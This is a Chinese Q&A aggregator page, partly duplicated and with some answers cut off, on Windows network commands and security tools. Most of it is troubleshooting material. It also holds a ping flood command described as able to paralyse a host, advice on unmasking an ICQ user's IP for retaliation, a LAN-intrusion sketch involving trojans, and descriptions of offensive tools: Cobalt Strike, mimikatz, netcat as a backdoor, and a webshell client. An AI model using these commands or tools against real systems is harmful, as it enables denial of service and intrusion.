當前位置:首頁 » 安全設置 » 網路安全最厲害的命令

網路安全最厲害的命令

發布時間: 2022-12-13 05:19:28

❶ dos有哪些網路命令功能是什麼越詳細越好。謝謝!

網路命令一覽表(絕對實用)

當你打開瀏覽器,自由地游弋於浩如煙海的互聯網世界之時,是否也沉迷於下載各種實用軟體?其中也許有很大一部分就是網路工具吧!但請你不要忽視你的面前——windows(包括win98和nt)作系統中本來就帶有不少的網路實用工具,雖然比較簡單,卻並不簡陋。本著「簡單就是美」的原則,下面就為你展現windows網路實用工具的豐采……

ping

ping是個使用頻率極高的實用程序,用於確定本地主機是否能與另一台主機交換(發送與接收)數據報。根據返回的信息,你就可以推斷tcp/ip參數是否設置得正確以及運行是否正常。需要注意的是:成功地與另一台主機進行一次或兩次數據報交換並不表示tcp/ip配置就是正確的,你必須執行大量的本地主機與遠程主機的數據報交換,才能確信tcp/ip的正確性。

簡單的說,ping就是一個測試程序,如果ping運行正確,你大體上就可以排除網路訪問層、網卡、modem的輸入輸出線路、電纜和路由器等存在的故障,從而減小了問題的范圍。但由於可以自定義所發數據報的大小及無休止的高速發送,ping也被某些別有用心的人作為ddos(拒絕服務攻擊)的工具,前段時間yahoo就是被黑客利用數百台可以高速接入互聯網的電腦連續發送大量ping數據報而癱瘓的。

按照預設設置,windows上運行的ping命令發送4個icmp(網間控制報文協議)回送請求,每個32位元組數據,如果一切正常,你應能得到4個回送應答。

ping能夠以毫秒為單位顯示發送回送請求到返回回送應答之間的時間量。如果應答時間短,表示數據報不必通過太多的路由器或網路連接速度比較快。ping還能顯示ttl(time to live存在時間)值,你可以通過ttl值推算一下數據包已經通過了多少個路由器:源地點ttl起始值(就是比返回ttl略大的一個2的乘方數)-返回時ttl值。例如,返回ttl值為119,那麼可以推算數據報離開源地址的ttl起始值為128,而源地點到目標地點要通過9個路由器網段(128-119);如果返回ttl值為246,ttl起始值就是256,源地點到目標地點要通過9個路由器網段。

通過ping檢測網路故障的典型次序

正常情況下,當你使用ping命令來查找問題所在或檢驗網路運行情況時,你需要使用許多ping命令,如果所有都運行正確,你就可以相信基本的連通性和配置參數沒有問題;如果某些ping命令出現運行故障,它也可以指明到何處去查找問題。下面就給出一個典型的檢測次序及對應的可能故障:

ping 127.0.0.1——這個ping命令被送到本地計算機的ip軟體,該命令永不退出該計算機。如果沒有做到這一點,就表示tcp/ip的安裝或運行存在某些最基本的問題。

ping 本機ip——這個命令被送到你計算機所配置的ip地址,你的計算機始終都應該對該ping命令作出應答,如果沒有,則表示本地配置或安裝存在問題。出現此問題時,區域網用戶請斷開網路電纜,然後重新發送該命令。如果網線斷開後本命令正確,則表示另一台計算機可能配置了相同的ip地址。

ping 區域網內其他ip——這個命令應該離開你的計算機,經過網卡及網路電纜到達其他計算機,再返回。收到回送應答表明本地網路中的網卡和載體運行正確。但如果收到0個回送應答,那麼表示子網掩碼(進行子網分割時,將ip地址的網路部分與主機部分分開的代碼)不正確或網卡配置錯誤或電纜系統有問題。

ping 網關ip——這個命令如果應答正確,表示區域網中的網關路由器正在運行並能夠作出應答。

ping 遠程ip——如果收到4個應答,表示成功的使用了預設網關。對於撥號上網用戶則表示能夠成功的訪問internet(但不排除isp的dns會有問題)。

ping localhost——localhost是個作系統的網路保留名,它是127.0.0.1的別名,每太計算機都應該能夠將該名字轉換成該地址。如果沒有做到這一帶內,則表示主機文件(/windows/host)中存在問題。

ping www.yahoo.com——對這個域名執行ping命令,你的計算機必須先將域名轉換成ip地址,通常是通過dns伺服器 如果這里出現故障,則表示dns伺服器的ip地址配置不正確或dns伺服器有故障(對於撥號上網用戶,某些isp已經不需要設置dns伺服器了)。順便說一句:你也可以利用該命令實現域名對ip地址的轉換功能。

如果上面所列出的所有ping命令都能正常運行,那麼你對你的計算機進行本地和遠程通信的功能基本上就可以放心了。但是,這些命令的成功並不表示你所有的網路配置都沒有問題,例如,某些子網掩碼錯誤就可能無法用這些方法檢測到。

ping命令的常用參數選項

ping ip -t——連續對ip地址執行ping命令,直到被用戶以ctrl+c中斷。

ping ip -l 2000——指定ping命令中的數據長度為2000位元組,而不是預設的32位元組。

ping ip -n——執行特定次數的ping命令。

netstat

netstat用於顯示與ip、tcp、udp和icmp協議相關的統計數據,一般用於檢驗本機各埠的網路連接情況。

如果你的計算機有時候接受到的數據報會導致出錯數據刪除或故障,你不必感到奇怪,tcp/ip可以容許這些類型的錯誤,並能夠自動重發數據報。但如果累計的出錯情況數目佔到所接收的ip數據報相當大的百分比,或者它的數目正迅速增加,那麼你就應該使用netstat查一查為什麼會出現這些情況了。

netstat的一些常用選項:

netstat -s——本選項能夠按照各個協議分別顯示其統計數據。如果你的應用程序(如web瀏覽器)運行速度比較慢,或者不能顯示web頁之類的數據,那麼你就可以用本選項來查看一下所顯示的信息。你需要仔細查看統計數據的各行,找到出錯的關鍵字,進而確定問題所在。

netstat -e——本選項用於顯示關於乙太網的統計數據。它列出的項目包括傳送的數據報的總位元組數、錯誤數、刪除數、數據報的數量和廣播的數量。這些統計數據既有發送的數據報數量,也有接收的數據報數量。這個選項可以用來統計一些基本的網路流量)。

netstat -r——本選項可以顯示關於路由表的信息,類似於後面所講使用route print命令時看到的 信息。除了顯示有效路由外,還顯示當前有效的連接。

netstat -a——本選項顯示一個所有的有效連接信息列表,包括已建立的連接(established),也包括監聽連接請求(listening)的那些連接。

netstat -n——顯示所有已建立的有效連接。

netstat的妙用

經常上網的人一般都使用icq的,不知道你有沒有被一些討厭的人騷擾得不敢上線,想投訴卻又不知從和下手?其實,你只要知道對方的ip,就可以向他所屬的isp投訴了。但怎樣才能通過icq知道對方的ip呢?如果對方在設置icq時選擇了不顯示ip地址,那你是無法在信息欄中看到的。其實,你只需要通過netstat就可以很方便的做到這一點:當他通過icq或其他的工具與你相連時(例如你給他發一條icq信息或他給你發一條信息),你立刻在dos prompt下輸入netstat -n或netstat -a就可以看到對方上網時所用的ip或isp域名了。甚至連所用port都完全暴露了,如果你想給他一些教訓,這些信息已經足夠……

ipconfig

ipconfig實用程序和它的等價圖形用戶界面——windows 95/98中的winipcfg可用於顯示當前的tcp/ip配置的設置值。這些信息一般用來檢驗人工配置的tcp/ip設置是否正確。但是,如果你的計算機和所在的區域網使用了動態主機配置協議(dynamic host configuration protocol,dhcp——windows nt下的一種把較少的ip地址分配給較多主機使用的協議,類似於撥號上網的動態ip分配),這個程序所顯示的信息也許更加實用。這時,ipconfig可以讓你了解你的計算機是否成功的租用到一個ip地址,如果租用到則可以了解它目前分配到的是什麼地址。了解計算機當前的ip地址、子網掩碼和預設網關實際上是進行測試和故障分析的必要項目。

最常用的選項:

ipconfig——當使用ipconfig時不帶任何參數選項,那麼它為每個已經配置了的介面顯示ip地址、子網掩碼和預設網關值

ipconfig /all——當使用all選項時,ipconfig能為dns和wins伺服器顯示它已配置且所要使用的附加信息(如ip地址等),並且顯示內置於本地網卡中的物理地址(mac)。如果ip地址是從dhcp伺服器租用的,ipconfig將顯示dhcp伺服器的ip地址和租用地址預計失效的日期(有關dhcp伺服器的相關內容請詳見其他有關nt伺服器的書籍或詢問你的網管),其輸出信息見圖6的下半部分。

ipconfig /release和ipconfig /renew——這是兩個附加選項,只能在向dhcp伺服器租用其ip地址的計算機上起作用。如果你輸入ipconfig /release,那麼所有介面的租用ip地址便重新交付給dhcp伺服器(歸還ip地址)。如果你輸入ipconfig /renew,那麼本地計算機便設法與dhcp伺服器取得聯系,並租用一個ip地址。請注意,大多數情況下網卡將被重新賦予和以前所賦予的相同的ip地址。

如果你使用的是windows 95/98,那麼你應該更習慣使用winipcfg而不是ipconfig,因為它是一個圖形用戶界面,而且所顯示的信息與ipconfig相同,並且也提供發布和更新動態ip地址的選項 如果你購買了windows nt resource kit(nt資源包),那麼windows nt也包含了一個圖形替代界面,該實用程序的名字是wntipcfg,和windows 95/98的winipcfg類似。

arp(地址轉換協議)

arp是一個重要的tcp/ip協議,並且用於確定對應ip地址的網卡物理地址。實用arp命令,你能夠查看本地計算機或另一台計算機的arp高速緩存中的當前內容。此外,使用arp命令,也可以用人工方式輸入靜態的網卡物理/ip地址對,你可能會使用這種方式為預設網關和本地伺服器等常用主機進行這項作,有助於減少網路上的信息量。

按照預設設置,arp高速緩存中的項目是動態的,每當發送一個指定地點的數據報且高速緩存中不存在當前項目時,arp便會自動添加該項目。一旦高速緩存的項目被輸入,它們就已經開始走向失效狀態。例如,在windows nt網路中,如果輸入項目後不進一步使用,物理/ip地址對就會在2至10分鍾內失效。因此,如果arp高速緩存中項目很少或根本沒有時,請不要奇怪,通過另一台計算機或路由器的ping命令即可添加。所以,需要通過arp命令查看高速緩存中的內容時,請最好先ping 此台計算機(不能是本機發送ping命令)。

常用命令選項:

arp -a或arp -g——用於查看高速緩存中的所有項目。-a和-g參數的結果是一樣的,多年來-g一直是unix平台上用來顯示arp高速緩存中所有項目的選項,而windows用的是arp -a(-a可被視為all,即全部的意思),但它也可以接受比較傳統的-g選項。

arp -a ip——如果你有多個網卡,那麼使用arp -a加上介面的ip地址,就可以只顯示與該介面相關的arp緩存項目。

arp -s ip 物理地址——你可以向arp高速緩存中人工輸入一個靜態項目。該項目在計算機引導過程中將保持有效狀態,或者在出現錯誤時,人工配置的物理地址將自動更新該項目。

arp -d ip——使用本命令能夠人工刪除一個靜態項目。



看到這里,你也許已經有些累了……其實對於一般用戶來說也已經足夠——你可以用ipconfig和ping命令來查看自己的網路配置並判斷是否正確、可以用netstat查看別人與你所建立的連接並找出icq使用者所隱藏的ip信息、可以用arp查看網卡的mac地址——這些已足已讓你丟掉菜鳥的頭銜。如果你並不滿足,那就「硬著頭皮」(下面的內容可能有些枯燥)繼續follow me……

tracert

當數據報從你的計算機經過多個網關傳送到目的地時,tracert命令可以用來跟蹤數據報使用的路由(路徑)。該實用程序跟蹤的路徑是源計算機到目的地的一條路徑,不能保證或認為數據報總遵循這個路徑。如果你的配置使用dns,那麼你常常會從所產生的應答中得到城市、地址和常見通信公司的名字。tracert是一個運行得比較慢的命令(如果你指定的目標地址比較遠),每個路由器你大約需要給它15秒鍾
tracert的使用很簡單,只需要在tracert後面跟一個ip地址或url,tracert會進行相應的域名轉換的。tracert一般用來檢測故障的位置,你可以用tracert ip在哪個環節上出了問題,雖然還是沒有確定是什麼問題,但它已經告訴了我們問題所在的地方,你也就可以很有把握的告訴別人——某某出了問題。

route

大多數主機一般都是駐留在只連接一台路由器的網段上。由於只有一台路由器,因此不存在使用哪一台路由器將數據報發表到遠程計算機上去的問題,該路由器的ip地址可作為該網段上所有計算機的預設網關來輸入。

但是,當網路上擁有兩個或多個路由器時,你就不一定想只依賴預設網關了。實際上你可能想讓你的某些遠程ip地址通過某個特定的路由器來傳遞,而其他的遠程ip則通過另一個路由器來傳遞。

在這種情況下,你需要相應的路由信息,這些信息儲存在路由表中,每個主機和每個路由器都配有自己獨一無二的路由表。大多數路由器使用專門的路由協議來交換和動態更新路由器之間的路由表。但在有些情況下,必須人工將項目添加到路由器和主機上的路由表中。route就是用來顯示、人工添加和修改路由表項目的。

一般使用選項:

route print——本命令用於顯示路由表中的當前項目,在單路由器網段上的輸出結果如圖12,由於用ip地址配置了網卡,因此所有的這些項目都是自動添加的。

route add——使用本命令,可以將信路由項目添加給路由表。例如,如果要設定一個到目的網路209.98.32.33的路由,其間要經過5個路由器網段,首先要經過本地網路上的一個路由器,器ip為202.96.123.5,子網掩碼為255.255.255.224,那麼你應該輸入以下命令:

route add 209.98.32.33 mask 255.255.255.224 202.96.123.5 metric 5

route change——你可以使用本命令來修改數據的傳輸路由,不過,你不能使用本命令來改變數據的目的地。下面這個例子可以將數據的路由改到另一個路由器,它採用一條包含3個網段的更直的路徑:

route add 209.98.32.33 mask 255.255.255.224 202.96.123.250 metric 3

route delete——使用本命令可以從路由表中刪除路由。例如:route delete 209.98.32.33

nbtstat

nbtstat(tcp/ip上的netbios統計數據)實用程序用於提供關於關於netbios的統計數據。運用netbios,你可以查看本地計算機或遠程計算機上的netbios名字表格。

常用選項:

nbtstat -n——顯示寄存在本地的名字和服務程序

nbtstat -c——本命令用於顯示netbios名字高速緩存的內容。netbios名字高速緩存用於寸放與本計算機最近進行通信的其他計算機的netbios名字和ip地址對。

nbtstat -r——本命令用於清除和重新載入netbios名字高速緩存。

nbtstat -a ip——通過ip顯示另一台計算機的物理地址和名字列表,你所顯示的內容就像對方計算機自己運行nbtstat -n一樣

nbtstat -s ip——顯示實用其ip地址的另一台計算機的netbios連接表。

net

net命令有很多函數用於實用和核查計算機之間的netbios連接。這里我只介紹最常用的兩個:net view和net use。

net view unc——運用此命令,你可以查看目標伺服器上的共享點名字。任何區域網里的人都可以發出此命令,而且不需要提供用戶id或口令。unc名字總是以\\開頭,後面跟隨目標計算機的名字。例如,net view \\lx就是查看主機名為lx的計算機的共享點(見圖15)。

net use 本地盤符 目標計算機共享點——本命令用於建立或取消到達特定共享點的映像驅動器的連接(如果需要,你必須提供用戶id或口令)。例如,你輸入net use f: \\lx\mp3就是將映像驅動器f:連接到\\lx\mp3共享點上,今後你直接訪問f:就可以訪問\\lx\mp3共享點,這和你右擊「我的電腦」選擇映射網路驅動器類似。

❷ 區域網入侵命令有哪些

先打開命令提示符,用ping命令去ping它,Replyfrom192.168.16.4:bytes=32time<1msTTL=128,說明對方沒有防火牆,這樣或許有可能入侵。

下一步,我使用了X-SCAN3.2對它進行了詳細掃描,對方電腦的操作系統是XP,大家知道XP系統是相當安全的,在一些黑客論壇討論的關於入侵XP的話題也是比較多的,入侵這樣的系統方法只有兩種,一是採用釣魚的方法,這是一種被動的方式讓對方中木馬來控制它。

第二種方法就是如果對方有比較嚴重的漏洞,如RPC溢出

❸ M開頭的CMD命令有哪些

網路安全工作者的必殺技 1.最基本,最常用的,測試物理網路的 ping 192.168.0.8 -t ,參數-t是等待用戶去中斷測試 2.查看DNS、IP、Mac等 A.Win98:winipcfg
B.Win2000以上:Ipconfig/all C.NSLOOKUP:如查看河北的DNS
C:\>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 則將DNS改為了41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68 Non-authoritative answer:
Name: pop.pcpop.com
Address: 202.99.160.212 3.網路信使 Net send 計算機名/IP* (廣播) 傳送內容,注意不能跨網段
net stop messenger 停止信使服務,也可以在面板-服務修改
net start messenger 開始信使服務 4.探測對方對方計算機名,所在的組、域及當前用戶名 (追捕的工作原理) ping -a IP -t ,只顯示NetBios名
nbtstat -a 192.168.10.146 比較全的 5.netstat -a 顯示出你的計算機當前所開放的所有埠 netstat -s -e 比較詳細的顯示你的網路資料,包括TCP、UDP、ICMP 和 IP的統計等 6.探測arp綁定(動態和靜態)列表,顯示所有連接了我的計算機,顯示對方IP和MAC地址 arp -a 7.在代理伺服器端 捆綁IP和MAC地址,解決區域網內盜用IP!:
ARP -s 192.168.10.59 00 -50-ff-6c-08-75
解除網卡的IP與MAC地址的綁定:
arp -d 網卡IP
8.在網路鄰居上隱藏你的計算機 net config server /hidden:yes
net config server /hidden:no 則為開啟 9.幾個net命令 A.顯示當前工作組伺服器列表 net view,當不帶選項使用本命令時,它就會顯示當前域或網路上的計算機上的列表。
比如:查看這個IP上的共享資源,就可以
C:\>net view 192.168.10.8
在 192.168.10.8 的共享資源
資源共享名 類型 用途 注釋
--------------------------------------
網站服務 Disk
命令成功完成。 B.查看計算機上的用戶帳號列表 net user
C.查看網路鏈接 net use
例如:net use z: \192.168.10.8\movie 將這個IP的movie共享目錄映射為本地的Z盤
D.記錄鏈接 net session
例如: C:\>net session
計算機 用戶名 客戶類型 打開空閑時間
-------------------------------------------------------------------------------
\192.168.10.110 ROME Windows 2000 2195 0 00:03:12 \192.168.10.51 ROME Windows 2000 2195 0 00:00:39
命令成功完成。 10.路由跟蹤命令 A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 除了顯示路由外,還提供325S的分析,計算丟失包的% 11.關於共享安全的幾個命令 A.查看你機器的共享資源 net share
B.手工刪除共享(可以編個bat文件,開機自運行,把共享都刪了!)
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
注意$後有空格。
C.增加一個共享:
c:\net share mymovie=e:\downloads\movie /users:1
mymovie 共享成功。
同時限制鏈接用戶數為1人。 12.在DOS行下設置靜態IP A.設置靜態IP
CMD

❹ cmd攻擊別人電腦命令,

無法攻擊別人電腦,但是可以訪問別人電腦。

如下參考:

1.在桌面上,單擊「開始」,單擊「運行」。

❺ 匯總下關於安全的13款必備工具

匯總下關於安全的幾款必備工具:

Burp Suite 是用於攻擊web 應用程序的集成平台,http協議分析神器,裡麵包括了不少安全必備的功能,重放、爆破、掃描並且支持自定義腳本,實現自己想要的功能。Burp Suite為這些工具設計了許多介面,以加快攻擊應用程序的過程。所有工具都共享一個請求,並能處理對應的HTTP 消息、持久性、認證、代理、日誌、警報。

工具下載地址:

工具運行需要Java環境,請自行安裝。

Nmap,也就是Network Mapper,最早是Linux下的網路掃描和嗅探工具包,掃描網路情況和埠開放情況,也可以載入nmap內置的poc腳本發現安全漏洞

官網:

nmap是一個網路連接端掃描軟體,用來掃描網上電腦開放的網路連接端。確定哪些服務運行在哪些連接端,並且推斷計算機運行哪個操作系統(這是亦稱 fingerprinting)。它是網路管理員必用的軟體之一,以及用以評估網路系統安全。

正如大多數被用於網路安全的工具,nmap 也是不少黑客及駭客(又稱腳本小子)愛用的工具 。系統管理員可以利用nmap來探測工作環境中未經批准使用的伺服器,但是黑客會利用nmap來搜集目標電腦的網路設定,從而計劃攻擊的方法。

Nmap 常被跟評估系統漏洞軟體Nessus 混為一談。Nmap 以隱秘的手法,避開闖入檢測系統的監視,並盡可能不影響目標系統的日常操作。

這個主要是利用sql注入漏洞的工具,可以自定義掃描規則和方式,若是通讀源碼之後對sql注入會有相當深的理解

官網:

這個是域名爆破工具,owasp開發的,該工具採用Go語言開發,它可以通過遍歷等形式爬取數據源和Web文檔,或利用IP地址來搜索相關的網塊和ASN,並利用所有收集到的信息來構建目標網路拓撲。速度和發現都相當不錯。


項目地址:


官網

ubuntu下安裝命令如下:

Masscan,是 robertdavidgraham 在 Github 上開源的埠掃描工具。

Masscan 性能優越,極限速度可以從單機每秒發送1000萬個數據包。Masscan 使用了與另一個著名的掃描工具 —— nmap 類似的命令行參數,方便進行上手使用。

Masscan 針對 TCP 埠進行掃描,使用 SYN 掃描的方式,不建立一個完全的 TCP 連接,而是首先發送一個 SYN 數據包到目標埠,然後等待接收。如果接收到 SYN-ACK 包,則說明該埠是開放的,此時發送一個 RST 結束建立過程即可;否則,若目標返回 RST,則埠不開放。 這個用來發現大規模網路下存活的ip和埠還是不錯,配合nmap發現服務可快速掃描網路

項目代碼位於

安裝 Masscan 可以從源碼進行編譯,在 Debian/Ubuntu 平台上,使用命令:

編譯得到的二進製程序位於子文件夾 masscan/bin。由於代碼中包含了大量的小文件,可以開啟多線程模式進行編譯:

https://www.isolves.com/it/wl/aq/2020-08-11/27736.html

Wireshark(前稱Ethereal)是一個網路封包分析軟體。網路封包分析軟體的功能是截取網路封包,並盡可能顯示出最為詳細的網路封包資料。Wireshark使用WinPCAP作為介面,直接與網卡進行數據報文交換。

下載地址

https://www.wireshark.org/download.html
7、metasploit


Metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業人士識別安全性問題,驗證漏洞的緩解措施,並管理專家驅動的安全性進行評估,提供真正的安全風險情報。這些功能包括智能開發,代碼審計,Web應用程序掃描, 社會 工程。團隊合作,在Metasploit和綜合報告提出了他們的發現。

下載地址


Cobalt Strike是一款基於java的滲透測試神器,常被業界人稱為CS神器。自3.0以後已經不在使用Metasploit框架而作為一個獨立的平台使用,分為客戶端與服務端,服務端是一個,客戶端可以有多個,非常適合團隊協同作戰,多個攻擊者可以同時連接到一個團隊伺服器上,共享攻擊資源與目標信息和sessions,可模擬APT做模擬對抗,進行內網滲透。

Cobalt Strike集成了埠轉發、服務掃描,自動化溢出,多模式埠監聽,win exe木馬生成,win dll木馬生成,java木馬生成,office宏病毒生成,木馬捆綁;釣魚攻擊包括:站點克隆,目標信息獲取,java執行,瀏覽器自動攻擊等等。

https://blog.csdn.net/weixin_44677409/article/details/102725129

mimikatz可以從內存中提取明文密碼、哈希、PIN 碼和 kerberos 票證。 mimikatz 還可以執行哈希傳遞、票證傳遞或構建黃金票證。

下載地址

https://blog.csdn.net/weixin_45663905/article/details/108013149 https://www.jianshu.com/p/4934f6c26475

這個是內網埠轉發工具,對於無法出網的埠相當好用。有Windows版和Linux版兩個版本,Windows版是lcx.exe,Linux版為portmap。

lcx有兩大功能:

https://www.zhuguodong.com/?id=486

代理隧道工具,可以讓工具走隧道進入內網環境,配合msf中的代理相當好用


github地址

1.建立文件夾proxychains,並進入下載

2.解壓縮

3.進入解壓縮後的目錄進行安裝

4.配置環境變數 打開文件.bashrc

將下面一段話考入該文件

使改變生效

有管理員許可權 直接執行以下命令

netcat被譽為網路安全界的『瑞士軍刀』,命令用於設置路由器。 一個簡單而有用的工具,透過使用TCP或UDP協議的網路連接去讀寫數據。它被設計成一個穩定的後門工具,能夠直接由其它程序和腳本輕松驅動。同時,它也是一個功能強大的網路調試和探測工具,能夠建立你需要的幾乎所有類型的網路連接,還有幾個很有意思的內置功能(詳情請看下面的使用方法)。

【沒有找到該工具logo,隨便找一個湊數】

https://www.cnblogs.com/zhaijiahui/p/9028402.html

中國蟻劍是一款開源的跨平台網站管理工具,它主要面向於合法授權的滲透測試安全人員以及進行常規操作的網站管理員。

通俗的講:中國蟻劍是 一 款比菜刀還牛的shell控制端軟體。

唯一官方github下載地址:

https://www.fujieace.com/hacker/tools/antsword.html

嫌棄一個個下載麻煩的同學有福了, 一口君已經下載,並存放在網盤里,

後台回復: 安全工具 即可下載

❻ 網路命令的問題

這是從別的地方過來的,我看著不錯,給大家分享一下:

對於Windows下ping命令相信大家已經再熟悉不過了,但是能把ping的功能發揮到最大的人卻並不是很多,當然我也並不是說我可以讓ping發揮最大的功能,我也只不過經常用ping這個工具,也總結了一些小經驗,現在和大家分享一下。

現在我就參照ping命令的幫助說明來給大家說說我使用ping時會用到的技巧,ping只有在安裝了TCP/IP協議以後才可以使用:

ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [-j computer-list] │ [-k computer-list] [-w timeout] destination-list

Options:

-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.

不停的ping地方主機,直到你按下Control-C。
此功能沒有什麼特別的技巧,不過可以配合其他參數使用,將在下面提到。

-a Resolve addresses to hostnames.

解析計算機NetBios名。

示例:
C:\>ping -a 192.168.1.21
Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Ping statistics for 192.168.1.21:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
從上面就可以知道IP為192.168.1.21的計算機NetBios名為iceblood.yofor.com。
-n count Number of echo requests to send.
發送count指定的Echo數據包數。
在默認情況下,一般都只發送四個數據包,通過這個命令可以自己定義發送的個數,對衡量網路速度很有幫助,比如我想測試發送50個數據包的返回的平均時間為多少,最快時間為多少,最慢時間為多少就可以通過以下獲知:
C:\>ping -n 50 202.103.96.68
Pinging 202.103.96.68 with 32 bytes of data:
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Request timed out.
………………
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Ping statistics for 202.103.96.68:
Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:
Minimum = 40ms, Maximum = 51ms, Average = 46ms
從以上我就可以知道在給202.103.96.68發送50個數據包的過程當中,返回了48個,其中有兩個由於未知原因丟失,這48個數據包當中返回速度最快為40ms,最慢為51ms,平均速度為46ms。
-l size Send buffer size.
定義echo數據包大小。
在默認的情況下windows的ping發送的數據包大小為32byt,我們也可以自己定義它的大小,但有一個大小的限制,就是最大隻能發送65500byt,也許有人會問為什麼要限制到65500byt,因為Windows系列的系統都有一個安全漏洞(也許還包括其他系統)就是當向對方一次發送的數據包大於或等於65532時,對方就很有可能當機,所以微軟公司為了解決這一安全漏洞於是限制了ping的數據包大小。雖然微軟公司已經做了此限制,但這個參數配合其他參數以後危害依然非常強大,比如我們就可以通過配合-t參數來實現一個帶有攻擊性的命令:(以下介紹帶有危險性,僅用於試驗,請勿輕易施於別人機器上,否則後果自負)
C:\>ping -l 65500 -t 192.168.1.21
Pinging 192.168.1.21 with 65500 bytes of data:
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
………………
這樣它就會不停的向192.168.1.21計算機發送大小為65500byt的數據包,如果你只有一台計算機也許沒有什麼效果,但如果有很多計算機那麼就可以使對方完全癱瘓,我曾經就做過這樣的試驗,當我同時使用10台以上計算機ping一台Win2000Pro系統的計算機時,不到5分鍾對方的網路就已經完全癱瘓,網路嚴重堵塞,HTTP和FTP服務完全停止,由此可見威力非同小可。
-f Set Don't Fragment flag in packet.
在數據包中發送「不要分段」標志。
在一般你所發送的數據包都會通過路由分段再發送給對方,加上此參數以後路由就不會再分段處理。
-i TTL Time To Live.
指定TTL值在對方的系統里停留的時間。
此參數同樣是幫助你檢查網路運轉情況的。

-v TOS Type Of Service.
將「服務類型」欄位設置為 tos 指定的值。
-r count Record route for count hops.
在「記錄路由」欄位中記錄傳出和返回數據包的路由。
在一般情況下你發送的數據包是通過一個個路由才到達對方的,但到底是經過了哪些路由呢?通過此參數就可以設定你想探測經過的路由的個數,不過限制在了9個,也就是說你只能跟蹤到9個路由,如果想探測更多,可以通過其他命令實現,我將在以後的文章中給大家講解。以下為示例:
C:\>ping -n 1 -r 9 202.96.105.101 (發送一個數據包,最多記錄9個路由)
Pinging 202.96.105.101 with 32 bytes of data:
Reply from 202.96.105.101: bytes=32 time=10ms TTL=249
Route: 202.107.208.187 ->
202.107.210.214 ->
61.153.112.70 ->
61.153.112.89 ->
202.96.105.149 ->
202.96.105.97 ->
202.96.105.101 ->
202.96.105.150 ->
61.153.112.90
Ping statistics for 202.96.105.101:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
從上面我就可以知道從我的計算機到202.96.105.101一共通過了202.107.208.187 ,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97這幾個路由。

-s count Timestamp for count hops.
指定 count 指定的躍點數的時間戳。
此參數和-r差不多,只是這個參數不記錄數據包返回所經過的路由,最多也只記錄4個。

-j host-list Loose source route along host-list.
利用 computer-list 指定的計算機列表路由數據包。連續計算機可以被中間網關分隔(路由稀疏源)IP 允許的最大數量為 9。

-k host-list Strict source route along host-list.
利用 computer-list 指定的計算機列表路由數據包。連續計算機不能被中間網關分隔(路由嚴格源)IP 允許的最大數量為 9。

-w timeout Timeout in milliseconds to wait for each reply.
指定超時間隔,單位為毫秒。
此參數沒有什麼其他技巧。
ping命令的其他技巧:在一般情況下還可以通過ping對方讓對方返回給你的TTL值大小,粗略的判斷目標主機的系統類型是Windows系列還是UNIX/Linux系列,一般情況下Windows系列的系統返回的TTL值在100-130之間,而UNIX/Linux系列的系統返回的TTL值在240-255之間,當然TTL的值在對方的主機里是可以修改的,Windows系列的系統可以通過修改注冊表以下鍵值實現:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"DefaultTTL"=dword:000000ff
255---FF
128---80
64----40
32----20
好了,ping命令的高級參數用法基本上被我COPY過來了,有什麼疑問歡迎提出,大家一起探討。

這是從別的地方過來的,我看著不錯,給大家分享一下:

對於Windows下ping命令相信大家已經再熟悉不過了,但是能把ping的功能發揮到最大的人卻並不是很多,當然我也並不是說我可以讓ping發揮最大的功能,我也只不過經常用ping這個工具,也總結了一些小經驗,現在和大家分享一下。

現在我就參照ping命令的幫助說明來給大家說說我使用ping時會用到的技巧,ping只有在安裝了TCP/IP協議以後才可以使用:

ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [-j computer-list] │ [-k computer-list] [-w timeout] destination-list

Options:

-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.

不停的ping地方主機,直到你按下Control-C。
此功能沒有什麼特別的技巧,不過可以配合其他參數使用,將在下面提到。

-a Resolve addresses to hostnames.

解析計算機NetBios名。

示例:
C:\>ping -a 192.168.1.21
Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Ping statistics for 192.168.1.21:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
從上面就可以知道IP為192.168.1.21的計算機NetBios名為iceblood.yofor.com。
-n count Number of echo requests to send.
發送count指定的Echo數據包數。
